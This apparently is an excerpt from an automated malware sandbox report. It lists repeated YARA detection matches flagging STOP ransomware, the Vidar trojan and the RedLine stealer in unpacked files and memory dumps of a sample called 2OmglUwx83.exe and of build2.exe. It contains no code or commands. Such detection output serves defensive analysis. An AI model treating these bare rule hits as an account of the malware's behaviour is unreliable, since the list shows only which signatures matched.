Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.381718272.0000000002011000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.422829204.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.350781670.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.420520373.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000000.00000002.354896040.0000000000674000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.419588694.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.388953002.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.396728940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.373449176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.421698327.0000000002162000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000000.410711943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.427284724.0000000000696000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.404465575.00000000007FF000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
